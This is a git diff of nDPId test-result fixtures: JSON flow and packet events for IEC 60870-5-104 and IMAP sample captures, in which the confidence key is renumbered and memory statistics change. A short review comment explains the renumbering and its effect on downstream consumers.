-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-payload-len":343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1219992852463} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":147,"packets-processed":147,"total-skipped-flows":0,"total-l4-payload-len":748,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1219993055118} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 147/147 @@ -46,9 +46,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879006 bytes -~~ total memory freed........: 5879006 bytes -~~ total allocations/frees...: 118281/118281 +~~ total memory allocated....: 6012640 bytes +~~ total memory freed........: 6012640 bytes +~~ total allocations/frees...: 121043/121043 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 698 chars 
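Review bot: The numeric key under `ndpi.confidence` changes from `"4"` to `"6"` while the label stays `"DPI"` in every `detected` and `end` event of the first hunk of this fixture. A downstream rule, schema or dashboard that matches the confidence by its number instead of its label would stop matching, or would match the wrong level, once this bump lands. The change presumably comes from an enum renumbering in the new libnDPI revision, but the commit message names only the revision. I would add a line such as `ndpi.confidence ids renumbered upstream (DPI: 4 -> 6); consumers should match on the label` and confirm that any JSON schema constraining these keys is updated in the same commit. The added line of the icmp-tunnel fixture above carries the same `{"6":"DPI"}` value.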
diff --git a/test/results/imap-starttls.pcap.out b/test/results/imap-starttls.pcap.out index 4c5207754..92d7616af 100644 --- a/test/results/imap-starttls.pcap.out +++ b/test/results/imap-starttls.pcap.out 
@@ -4,8 +4,8 @@ 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":6193,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1437584570828} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872440 bytes -~~ total memory freed........: 5872440 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6006074 bytes +~~ total memory freed........: 6006074 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 820 chars diff --git a/test/results/imap.pcap.out b/test/results/imap.pcap.out index 72ac1eab2..393da3432 100644 --- a/test/results/imap.pcap.out +++ b/test/results/imap.pcap.out 
@@ -4,8 +4,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} -00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} 
